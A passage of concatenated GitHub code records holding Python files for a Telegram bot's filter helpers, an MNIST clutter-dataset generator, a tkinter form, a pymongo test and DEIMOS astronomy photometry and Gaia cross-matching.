sys\nsys.path.append('../api')\n\nsys.path.append('../conn')\nimport filters\nsys.path.append('../conn')\nimport mysql5\n\n\ncompetenze = \"\"\n\n\n\n'''Returns all the competences from db'''\ndef get_competences():\n docList = mysql5.getCompetences()\n competenze1 = \"\"\n competenze2 = \"\"\n docSize = 0\n for i in docList:\n docSize +=1 \n id_c = int(i[0])\n\n if id_c < 0:\n id_c = str( \"_\" + str(id_c)[1:] )\n else:\n id_c = str(id_c)\n\n competence = str(i[1])\n \n if docSize > 80:\n competenze2 += competence + \" \" + \"/_id_c_\" + id_c + \"\\n\"\n else:\n competenze1 += competence + \" \" + \"/_id_c_\" + id_c + \"\\n\"\n\n return competenze1, competenze2\n\n\ndef get_products():\n docList = mysql5.getProducts()\n productrs = \"\"\n print(\"lista:\", docList)\n for i in docList:\n productrs += str(i[1]) + \" \" + \"/_id_p_\" + str(i[0]) + \"\\n\"\n print(productrs)\n return productrs\n\ndef get_areas():\n area_list = mysql5.get_areas()\n areas = \"\"\n print(\"lista:\", area_list)\n for i in area_list:\n areas += \" \" + str(i[2]) + \" \"+ \"/_id_area_\" + str(i[0]) + \"\\n\"\n print(areas)\n return areas\n\ndef get_sub_areas(tid):\n\n # fet the area for the user tid\n sub_areas = filters.get_area_from_tid(tid)\n if len(sub_areas) < 1:\n return \"Non esiste Area per la sottoarea selezionata. Inserire prima l'area\"\n\n s_area_list = mysql5.get_sub_areas(sub_areas[0][0])\n s_areas = \"\"\n print(\"lista:\", s_area_list)\n for i in s_area_list:\n s_areas += \" \" + str(i[2]) + \" \"+ \"/_id_suba_\" + str(i[0]) + \"\\n\"\n print(s_areas)\n return s_areas\n\n\n\ndef decodeCompetence(cid,docList):\n for i in docList:\n if str(i['id']).strip() == cid:\n return str(i['label']).strip()\n return 0\n\n\n\ndef getMyFilters(tid):\n mylist = filters.getFilters(tid)\n listFilterAsString= \"\"\n for i in mylist:\n tipo = \"\"\n if str(i[2]) == \"C\":\n tipo = \"Competenza\"\n elif str(i[2]) == 'P':\n tipo = \"Prodotto\"\n elif str(i[2]) == 'A':\n tipo = \"Area\"\n elif str(i[2]) == 'S':\n tipo = \"Sottoarea\"\n listFilterAsString += tipo + \": (\" + str(i[3]) + \") \" + mysql5.getProductOrCompetence(str(i[2]), str(i[3]))[0][0] + \"\\n\"\n return listFilterAsString\n\n\ndef showFilterToBeDelete(tid):\n mylist = filters.getFilters(tid)\n listFilterAsString= \"\"\n for i in mylist:\n tipo = \"\"\n if str(i[2]) == \"C\":\n tipo = \"Competen\"\n elif str(i[2]) == 'P':\n tipo = \"Prodotto\"\n elif str(i[2]) == 'A':\n tipo = \"Area\"\n elif str(i[2]) == 'S':\n tipo = \"Sottoarea\"\n listFilterAsString += \"/\" + tipo + \"_id_cf_\" + str(i[0]) + \") \" + mysql5.getProductOrCompetence(str(i[2]), str(i[3]))[0][0] + \"\\n\"\n return listFilterAsString\n\n\n\ndef deleteFilter(telid, fid):\n if filters.deleteFilter(telid, fid):\n return \"Filtro cancellato con successo\"\n else:\n \"Non è stato possibile cancella il tuo filtro, riprova piu tardi!\"\n\n\n\n# print(getMyFilters(145645559))\n#print(deleteFilter(145645559))\n# get_competence()","repo_name":"TomasMali/Ticket","sub_path":"telepot/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4385462510","text":"import numpy as np\nimport cv2\nimport os\n\ndef load_data(trainingData, trainingLabel, testingData, testingLabel, dataset = \"MNIST\"):\n trainingData = os.environ[dataset] + trainingData\n trainingLabel = os.environ[dataset] + trainingLabel\n testingData = os.environ[dataset] + testingData\n testingLabel = os.environ[dataset] + testingLabel\n\n X_train = np.array(np.load(trainingData), dtype = np.float32).reshape(-1, 1, 28, 28)\n Y_train = np.array(np.load(trainingLabel), dtype = np.uint8)\n X_test = np.array(np.load(testingData), dtype = np.float32).reshape(-1, 1, 28, 28)\n Y_test = np.array(np.load(testingLabel), dtype = np.uint8)\n\n return X_train, Y_train, X_test, Y_test\ndef rotateImage(image, angle):\n if len(image.shape) == 3:\n image = image[0]\n image_center = tuple(np.array(image.shape)/2)\n rot_mat = cv2.getRotationMatrix2D(image_center,angle,1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape,flags=cv2.INTER_LINEAR)\n return np.array(result[np.newaxis, :, :], dtype = np.float32)\n\n\ndef extend_image(inputs, images = None, mega_patch_w=8, size=40, num_strokes=5):\n if len(inputs.shape) == 3:\n inputs = inputs.reshape(inputs.shape[0], 1, inputs.shape[1], inputs.shape[2])\n\n if images is None:\n images = inputs[np.random.randint(low = 0, high = inputs.shape[0], size = 100)]\n\n num_samples = inputs.shape[0]\n image_size, image_channel, image_w, image_h = images.shape\n\n extended_images_with_clutter = np.zeros((inputs.shape[0], 1, size, size), dtype = np.float32)\n extended_images = np.zeros((inputs.shape[0], 1, size, size), dtype = np.float32)\n\n margin_size = (size - inputs.shape[2]) / 2\n for i in range(inputs.shape[0]):\n\n for j in range(num_strokes):\n intensity = 0\n t_y = np.random.randint(size - mega_patch_w)\n t_x = np.random.randint(size - mega_patch_w)\n patch = np.zeros((mega_patch_w, mega_patch_w))\n while(intensity < 12):\n index = np.random.randint(image_size)\n s_y = np.random.randint(image_w - mega_patch_w)\n s_x = np.random.randint(image_h - mega_patch_w)\n patch = images[index, 0, s_x:s_x + mega_patch_w, s_y:s_y + mega_patch_w]\n intensity = np.sum(patch)\n extended_images_with_clutter[i, 0, t_x:t_x + mega_patch_w, t_y:t_y + mega_patch_w] = patch\n \n #margin_x = np.random.randint(0, size - inputs.shape[2])\n #margin_y = np.random.randint(0, size - inputs.shape[3])\n x_value_index = np.where(np.sum(inputs[i, 0], axis = 1) != 0)[0]\n y_value_index = np.where(np.sum(inputs[i, 0], axis = 0) != 0)[0]\n\n x_left = x_value_index[0]\n x_right = x_value_index[-1]\n x_length = x_right - x_left + 1\n y_left = y_value_index[0]\n y_right = y_value_index[-1]\n y_length = y_right - y_left + 1\n\n margin_x = np.random.randint(0, size - x_length)\n margin_y = np.random.randint(0, size - y_length)\n\n extended_images[i, :, margin_x:margin_x + x_length, margin_y:margin_y + y_length] = inputs[i, :, x_left: x_left + x_length, y_left: y_left + y_length]\n extended_images_with_clutter[i, :, margin_x:margin_x + x_length, margin_y:margin_y + y_length] = inputs[i, :, x_left : x_left + x_length, y_left: y_left + y_length]\n \n return extended_images, extended_images_with_clutter\n\n\n\n\nX_train, y_train, X_test, y_test = load_data(\"/X_train.npy\", \"/Y_train.npy\", \"/X_test.npy\", \"/Y_test.npy\")\n#X_test = extend_image(X_test, 40)\n#X_train = extend_image(X_train, 40)\n\ntrain_size = y_train.shape[0]\nall_images = []\nall_labels = []\nfor j in range(1):\n angles_1 = list(np.random.randint(low = -90, high = 0, size = train_size // 2))\n angles_2 = list(np.random.randint(low = 0, high = 90, size = train_size // 2))\n angles = np.array(angles_1 + angles_2)\n np.random.shuffle(angles)\n rotated_image = np.array([rotateImage(X_train[i], angles[i]) for i in range(train_size)], dtype = np.float32)\n all_images.append(rotated_image)\n all_labels.append(y_train)\n#all_images = np.vstack(all_images)\n#all_labels = np.hstack(all_labels)\nall_images = X_train\nall_labels = y_train\n\nprint(all_images.shape, all_labels.shape)\n\nindex = np.arange(1 * train_size)\nnp.random.shuffle(index)\n\nall_images = all_images[index]\nall_labels = all_labels[index]\n\n\n\nx_train, x_train_cluttered = extend_image(all_images, size = 60)\ny_train = all_labels\n\ntest_size = y_test.shape[0]\nall_images = []\nall_labels = []\nfor j in range(1):\n angles_1 = list(np.random.randint(low = -90, high = 0, size = test_size // 2))\n angles_2 = list(np.random.randint(low = 0, high = 90, size = test_size // 2))\n angles = np.array(angles_1 + angles_2)\n np.random.shuffle(angles)\n rotated_image = np.array([rotateImage(X_test[i], angles[i]) for i in range(test_size)], dtype = np.float32)\n all_images.append(rotated_image)\n all_labels.append(y_test)\n#all_images = np.vstack(all_images)\nall_images = X_test\n#all_labels = np.hstack(all_labels)\nall_labels = y_test\n\nprint(all_images.shape, all_labels.shape)\n\nindex = np.arange(1 * test_size)\nnp.random.shuffle(index)\n\nall_images = all_images[index]\nall_labels = all_labels[index]\n\n\n\nx_test, x_test_cluttered = extend_image(all_images, size = 60)\ny_test = all_labels\n\nnp.savez(\"/phddata/jiajun/Research/mnist/mnist_60_shift_cluttered.npz\", x_train = x_train, y_train = y_train, x_test = x_test, y_test=y_test, x_train_cluttered = x_train_cluttered, x_test_cluttered = x_test_cluttered)\n\n","repo_name":"jiajunshen/MultipleDetection","sub_path":"create_shift_MNIST_dataset_60_with_clutter.py","file_name":"create_shift_MNIST_dataset_60_with_clutter.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"75047824466","text":"import tkinter as tk\n\n\nclass App(tk.Frame):\n def __init__(self, master=None):\n super().__init__(master)\n self.master.title(\"ウィンドウのタイトル\")\n\n self.pack()\n self.create_widget1()\n\n def create_widget1(self):\n\n self.label1 = tk.Label(self.master, text=\"ユーザー情報を入力してください\", padx=50)\n self.label1.pack(padx=5, pady=5)\n\n items = [\"氏名\", \"生年月日\", \"電話番号\", \"メールアドレス\"]\n\n def fetch(entries):\n for entry in entries:\n item = entry[0]\n text = entry[1].get()\n print('{}: {}'.format(item, text))\n\n def makeform(self, items):\n entries = []\n for item in items:\n row = tk.Frame(self.master)\n label = tk.Label(row, text=item)\n entry = tk.Entry(row)\n\n row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)\n label.pack(side=tk.LEFT)\n entry.pack(side=tk.RIGHT, fill=tk.X)\n entries.append((item, entry))\n\n return entries\n\n ents = makeform(self, items)\n\n self.button1 = tk.Button(self.master, text=\"確認\", command=(lambda e=ents: fetch(e)))\n self.button1.pack(side=tk.LEFT, padx=5, pady=5)\n\n self.button2 = tk.Button(self.master, text=\"終了\", command=self.master.quit)\n self.button2.pack(side=tk.LEFT, padx=5, pady=5)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = App(master=root)\n app.mainloop()\n","repo_name":"yokamoto5742/pythongui","sub_path":"python_gui_secondstep/531.py","file_name":"531.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36426074036","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nfrom bs4 import BeautifulSoup\nimport pymongo\n\nMONGO_URL = 'localhost'\nMONGO_DB = 'toutiao'\nMONGO_TABLE = 'test1'\n\nclient = pymongo.MongoClient('localhost')\ndb = client['trip']\n\n\n# client=pymongo.MongoClient(MONGO_URL)\nclient=pymongo.MongoClient(MONGO_URL,connect=False)\ndb=client[MONGO_DB]\n\ndef get_result(offset,keyword):\n data={\n 'offset': offset,\n 'keyword': keyword\n }\n\ndef main():\n data={\n 'id': 1,\n 'keyword': 'kw'\n }\n\n # for i in range(10):\n # data['id']=str(i)\n # print(data)\n # db[MONGO_TABLE].insert(data)\n # print('存储到MongoDB成功', data)\n db[MONGO_TABLE].insert(data)\n # for i in range(10):\n # if db[MONGO_TABLE].insert(result):\n # print(i)\n # print('存储到MongoDB成功', result)\n # return True\n # return False\n\nif __name__ == '__main__':\n main()\n","repo_name":"gitstudy8/hellobi-pythonStudy2","sub_path":"TouTiao-master/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39917161334","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport os,sys\n \nfrom astropy.coordinates import SkyCoord\n\n\nfrom astropy.table import Table\nfrom astropy import units as u\nfrom astropy.io import ascii,fits\n\nimport sfdmap\n\n\n###########################################\ndef get_ebv(allspec):\n\n DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n\n sdf_ext = sfdmap.SFDMap(DEIMOS_RAW+'SFDmaps/')\n EBV = sdf_ext.ebv(allspec['RA'],allspec['DEC'])\n\n allspec['EBV'] = EBV\n\n Ar = 2.751 * allspec['EBV']\n Ag = 3.793 * allspec['EBV']\n\n\n return allspec, Ar, Ag\n \n\n###########################################\ndef calc_MV_star(allspec,obj):\n \n # DISTANCE MODULUS AND REDDENING\n dmod = 5.*np.log10(obj['Dist_kpc']*1e3) - 5.\n\n\n # Jester 2005\n # https://classic.sdss.org/dr5/algorithms/sdssUBVRITransform.php \n # V = g - 0.59*(g-r) - 0.01 \n #V = allspec['gmag_o'] - 0.59*gr_o -0.01\n # Jordi 2006\n # V = allspec['gmag_o'] - 0.565*gr_o -0.016\n # Using Lupton\n # V = g - 0.5784*(g - r) - 0.0038; sigma = 0.0054\n\n gr_o = allspec['gmag_o'] - allspec['rmag_o'] \n V = allspec['gmag_o'] - 0.565*gr_o -0.016\n\n allspec['MV_o'] = V - dmod\n \n return allspec\n\n###########################################\ndef calc_rproj(allspec,obj):\n\n sc_gal = SkyCoord(obj['RA'],obj['Dec'], unit=(u.deg, u.deg),distance = obj['Dist_kpc']*u.kpc)\n\n\n # CALCULATE STAR RADIUS FROM OBJECT CENTER\n sc_all = SkyCoord(allspec['RA'],allspec['DEC'], unit=(u.deg, u.deg),distance = obj['Dist_kpc']*u.kpc)\n\n sep = sc_all.separation(sc_gal)\n allspec['rproj_arcm'] = sep.arcmin\n\n sep3d = sc_all.separation_3d(sc_gal)\n allspec['rproj_kpc'] = sep3d.kpc \n\n\n return allspec\n\n###########################################\ndef CaT_to_FeH(alldata):\n \n FeH = -99\n FeH_err = -99\n \n \n m = (alldata['MV_o'] != -99) & (alldata['ew_cat'] > 0.)\n \n\n mag = alldata['MV_o'][m]\n CaT = alldata['ew_cat'][m]\n CaTerr = alldata['ew_cat_err'][m]\n\n # #######Carrera 2013##########\n # [value, error] using M_V\n a = [-3.45,0.04]\n b = [0.16,0.01]\n c = [0.41,0.004]\n d = [-0.53,0.11]\n e = [0.019, 0.002]\n FeH = a[0] + b[0]* mag + c[0]*CaT + d[0]*CaT**(-1.5) + e[0]*CaT*mag\n\n # PROPOGATE errORS -- ASSUME NO errOR ON MAGNITUDE FOR NOW...\n FeH_err = np.sqrt( (a[1]**2) +\\\n (mag*b[1]**2) +\\\n (c[1]**2*CaT**2 + c[0]**2*CaTerr**2) +\\\n (d[1]**2*CaT**(-1.5*2) + d[0]**2*(CaTerr**2)*CaT**(-2.5)) +\\\n (e[1]**2*(CaT*mag)**2 + CaTerr**2*(e[0]*mag)**2))\n\n \n alldata['ew_feh'][m] = FeH\n alldata['ew_feh_err'][m] = FeH_err\n\n return alldata\n\n###########################################\ndef match_gaia(obj,allspec):\n\n DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n gaia_file = DEIMOS_RAW + '/Gaia_DR3/gaia_dr3_'+obj['Name2']+'.csv'\n\n \n if not os.path.isfile(gaia_file):\n print('NO GAIA FILE',gaia_file)\n\n \n if os.path.isfile(gaia_file):\n\n gaia = Table.read(gaia_file)\n \n\n cgaia = SkyCoord(ra=gaia['ra']*u.degree, dec=gaia['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cgaia) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n mt2 = idx[d2d < 1.*u.arcsec]\n allspec['gaia_source_id'][mt] = gaia['source_id'][mt2]\n allspec['gaia_pmra'][mt] = gaia['pmra'][mt2] \n allspec['gaia_pmra_err'][mt] = gaia['pmra_error'][mt2]\n allspec['gaia_pmdec'][mt] = gaia['pmdec'][mt2] \n allspec['gaia_pmdec_err'][mt] = gaia['pmdec_error'][mt2]\n allspec['gaia_parallax'][mt] = gaia['parallax'][mt2] \n allspec['gaia_parallax_err'][mt] = gaia['parallax_error'][mt2]\n allspec['gaia_rv'][mt] = gaia['radial_velocity'][mt2] \n allspec['gaia_rv_err'][mt] = gaia['radial_velocity_error'][mt2] \n\n allspec['gaia_aen'][mt] = gaia['astrometric_excess_noise'][mt2] \n allspec['gaia_aen_sig'][mt] = gaia['astrometric_excess_noise_sig'][mt2]\n\n\n # SET NON_DETECTED BACK TO DEFAULT\n # GAIA DEFAULTS ARE ZERO (CONFUSING!)\n m = allspec['gaia_pmra_err'] == 0.0\n allspec['gaia_pmra'][m] = -999.\n m = allspec['gaia_pmdec_err'] == 0.0\n allspec['gaia_pmdec'][m] = -999.\n m = allspec['gaia_parallax_err'] == 0.0\n allspec['gaia_parallax'][m] = -999.\n mrv = allspec['gaia_rv'] == 0.0\n allspec['gaia_rv'][mrv] = -999.\n nrv = np.sum(allspec['gaia_rv'] > -999.)\n\n # SET GAIA FLAG \n m = allspec['gaia_pmra'] > -999\n allspec['flag_gaia'][m] = 1\n\n print('GAIA: Matched {} stars and {} Gaia RVS'.format(np.size(mt),nrv))\n\n\n return allspec\n\n###########################################\n###########################################\ndef match_photometry(obj,allspec):\n \n DEIMOS_RAW = os.getenv('DEIMOS_RAW')\n\n # POPULATE EBV\n allspec, Ar, Ag = get_ebv(allspec)\n nall = np.size(allspec)\n nobj = np.sum(allspec['v_err'] >= 0)\n nstar = np.sum(allspec['v_err'] > 0)\n\n\n #####################\n ### MUNOZ -- COMPLETE UNPUBLISHED CATALOGS\n if obj['Phot'] == 'munozf':\n \n file = DEIMOS_RAW + '/Photometry/munoz_full/final_'+obj['Name2']+'.phot'\n\n munozf = ascii.read(file)\n munozf.rename_column('col2', 'RA')\n munozf.rename_column('col3', 'DEC')\n munozf.rename_column('col4', 'g')\n munozf.rename_column('col5', 'gerr')\n munozf.rename_column('col6', 'r')\n munozf.rename_column('col7', 'rerr')\n\n \n if (obj['Name2'] == 'Eri') | (obj['Name2'] == 'K2')| (obj['Name2'] == 'Leo2')| \\\n (obj['Name2'] == 'Seg2') | (obj['Name2'] == 'N2419')| (obj['Name2'] == 'Pal2'):\n munozf['RA'] *= 15.\n \n cmunf = SkyCoord(ra=munozf['RA']*u.degree, dec=munozf['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmunf) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = munozf['r'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = munozf['g'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = munozf['rerr'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = munozf['gerr'][idx[d2d < 1.*u.arcsec]]\n\n allspec['phot_source'][mt] = 'munozf'\n \n\n \n #####################\n ### MUNOZ -- COMPLETE UNPUBLISHED CATALOGS\n if obj['Phot'] == 'munoz18_2':\n \n file = DEIMOS_RAW + '/Photometry/munoz18/munoz18_secondary.txt'\n\n munozf = ascii.read(file)\n\n cmunf = SkyCoord(ra=munozf['ra']*u.degree, dec=munozf['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cmunf) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = munozf['r'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = munozf['g'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = munozf['rerr'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = munozf['gerr'][idx[d2d < 1.*u.arcsec]]\n \n allspec['phot_source'][mt] = 'munoz18_2'\n\n\n #####################\n ### GC SDSS PHOTOMETRY\n # http://classic.sdss.org/dr7/products/value_added/anjohnson08_clusterphotometry.html\n if obj['Phot'] == 'sdss_gc':\n file = DEIMOS_RAW + '/Photometry/sdss_gc/sdss_gc_'+obj['Name2']+'.phot'\n sdss = ascii.read(file)\n \n sdss.rename_column('col5', 'RA')\n sdss.rename_column('col6', 'DEC')\n sdss.rename_column('col16', 'gmag')\n sdss.rename_column('col17', 'gmag_err')\n sdss.rename_column('col23', 'rmag')\n sdss.rename_column('col24', 'rmag_err')\n\n \n csdss = SkyCoord(ra=sdss['RA']*u.degree, dec=sdss['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(csdss) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = sdss['rmag'][idx[d2d < 1.*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = sdss['gmag'][idx[d2d < 1.*u.arcsec]] - Ag[mt]\n allspec['rmag_err'][mt] = sdss['rmag_err'][idx[d2d < 1.*u.arcsec]]\n allspec['gmag_err'][mt] = sdss['gmag_err'][idx[d2d < 1.*u.arcsec]]\n\n allspec['phot_source'][mt] = 'sdss_gc'\n\n\n\n #####################\n ### LEGACY DR10\n if obj['Phot'] == 'ls_dr10':\n file = DEIMOS_RAW + '/Photometry/legacy_DR10/dr10_'+obj['Name2']+'.csv'\n ls_dr10 = ascii.read(file)\n \n ls_dr10.rename_column('dered_mag_g', 'gmag')\n ls_dr10.rename_column('dered_mag_r', 'rmag')\n\n # CORRECT BASS MAGNITUDES NORTHERN MAGNITUDES\n if np.median(ls_dr10['dec'] > 34.):\n ls_dr10['rmag'] = -0.0382 * (ls_dr10['gmag'] - ls_dr10['rmag']) + 0.0108 + ls_dr10['rmag']\n\n \n cls_dr10 = SkyCoord(ra=ls_dr10['ra']*u.degree, dec=ls_dr10['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = ls_dr10['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = ls_dr10['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n allspec['phot_source'][mt] = 'ls_dr10'\n\n\n ###########################\n if obj['Phot'] == 'ls_dr10i':\n file = DEIMOS_RAW + '/Photometry/legacy_DR10/dr10_'+obj['Name2']+'.csv'\n ls_dr10 = ascii.read(file)\n \n # hack, if rmag isn't available\n gmag = ls_dr10['dered_mag_g']\n rmag = ls_dr10['dered_mag_i'] + 0.3\n\n\n cls_dr10 = SkyCoord(ra=ls_dr10['ra']*u.degree, dec=ls_dr10['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = rmag[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = gmag[idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n \n allspec['phot_source'][mt] = 'ls_dr10'\n\n ### DELVE\n if obj['Phot'] == 'delve':\n file = DEIMOS_RAW + '/Photometry/delve/delve_'+obj['Name2']+'.csv'\n delve = Table.read(file)\n \n \n cls_dr10= SkyCoord(ra=delve['RA']*u.degree, dec=delve['DEC']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_dr10) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = delve['rmag_o'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = delve['gmag_o'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = delve['rmag_err'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_err'][mt] = delve['rmag_err'][idx[d2d < 1.*u.arcsec]] \n\n allspec['phot_source'][mt] = 'delve'\n\n\n ## PANSTARRS DR2\n # https://catalogs.mast.stsci.edu/\n if obj['Phot'] == 'PanS':\n file = DEIMOS_RAW + '/Photometry/PanS/PanS_'+obj['Name2']+'.csv'\n pans = ascii.read(file)\n m=(pans['rMeanPSFMag'] != -999) & (pans['gMeanPSFMag'] != -999)\n pans=pans[m]\n \n # TRANSFORM TO SDSS USING Tonry et al 2012\n gr_p = pans['gMeanPSFMag'] - pans['rMeanPSFMag']\n g_sdss = pans['gMeanPSFMag'] + 0.013 + 0.145*gr_p + 0.019*gr_p**2\n r_sdss = pans['rMeanPSFMag'] - 0.001 + 0.004*gr_p + 0.007*gr_p**2\n \n cpans = SkyCoord(ra=pans['raMean']*u.degree, dec=pans['decMean']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n \n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cpans) \n foo = np.arange(0,np.size(idx),1)\n\n # INCREASED TO 2\" TO GET CENTRAL GLOBULAR CLUSTER MEMBERS\n ds = 2.0\n mt = foo[d2d < ds*u.arcsec]\n allspec['rmag_o'][mt] = r_sdss[idx[d2d < ds*u.arcsec]] - Ar[mt]\n allspec['gmag_o'][mt] = g_sdss[idx[d2d < ds*u.arcsec]] - Ag[mt]\n \n allspec['rmag_err'][mt] = pans['rMeanPSFMagErr'][idx[d2d < ds*u.arcsec]]\n allspec['gmag_err'][mt] = pans['gMeanPSFMagErr'][idx[d2d < ds*u.arcsec]]\n\n allspec['phot_source'][mt] = 'PanS'\n\n \n #####################\n ### USE GAIA IF THERE ARE NO OTHER OPTIONS\n if obj['Phot'] == 'gaia':\n file = DEIMOS_RAW + '/Gaia_DR3/gaia_dr3_'+obj['Name2']+'.csv'\n gaia = ascii.read(file)\n \n # TRANSFORM USING Table 5.7\n #https://gea.esac.esa.int/archive/documentation/GDR3/Data_processing/chap_cu5pho/cu5pho_sec_photSystem/cu5pho_ssec_photRelations.html#Ch5.T8 \n\n G_BP_RP = gaia['bp_rp']\n G = gaia['phot_g_mean_mag']\n\n Gr = -0.09837 + 0.08592*G_BP_RP + 0.1907*G_BP_RP**2 - 0.1701*G_BP_RP**3 + 0.02263*G_BP_RP**4\n Gg = 0.2199 - 0.6365*G_BP_RP - 0.1548*G_BP_RP**2 + 0.0064*G_BP_RP**3\n rmag = G - Gr\n gmag = G - Gg\n err = (2.5/np.log(10)) / gaia['phot_g_mean_flux_over_error']\n gaia_err = np.sqrt(err**2 + 0.07**2)\n\n # TRANSFORMATION IS TOTALLY OFF\n rmag = gaia['phot_rp_mean_mag']\n gmag = gaia['phot_g_mean_mag']-0.3\n\n\n cgaia = SkyCoord(ra=gaia['ra']*u.degree, dec=gaia['dec']*u.degree) \n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cgaia) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = rmag[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = gmag[idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = gaia_err[idx[d2d < 1.*u.arcsec]] \n allspec['gmag_err'][mt] = gaia_err[idx[d2d < 1.*u.arcsec]] \n\n allspec['phot_source'][mt] = 'gaia'\n\n ### HST\n if obj['Phot'] == 'hst':\n file = DEIMOS_RAW + '/Photometry/hst/hst_'+obj['Name2']+'.dat'\n hst = ascii.read(file)\n \n hst.rename_column('F606', 'gmag')\n hst.rename_column('F814', 'rmag')\n cls_hst = SkyCoord(ra=hst['RA']*u.degree, dec=hst['Dec']*u.degree) \n\n\n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_hst) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = hst['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = hst['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 0.01\n\n ### HST - ACS\n if obj['Phot'] == 'ACS':\n file = DEIMOS_RAW + '/Photometry/hst/hst_'+obj['Name2']+'.fits'\n hst = Table.read(file)\n # REMOVE SUPER FAINT STARS\n m=hst['F814W_VEGA'] > 25\n hst=hst[m]\n\n hst.rename_column('F475W_VEGA', 'gmag')\n hst.rename_column('F814W_VEGA', 'rmag')\n cls_hst = SkyCoord(ra=hst['RA']*u.degree, dec=hst['DEC']*u.degree) \n\n cdeimos = SkyCoord(ra=allspec['RA']*u.degree, dec=allspec['DEC']*u.degree) \n\n idx, d2d, d3d = cdeimos.match_to_catalog_sky(cls_hst) \n foo = np.arange(0,np.size(idx),1)\n\n mt = foo[d2d < 1.*u.arcsec]\n allspec['rmag_o'][mt] = hst['rmag'][idx[d2d < 1.*u.arcsec]] \n allspec['gmag_o'][mt] = hst['gmag'][idx[d2d < 1.*u.arcsec]] \n allspec['rmag_err'][mt] = 0.01\n allspec['gmag_err'][mt] = 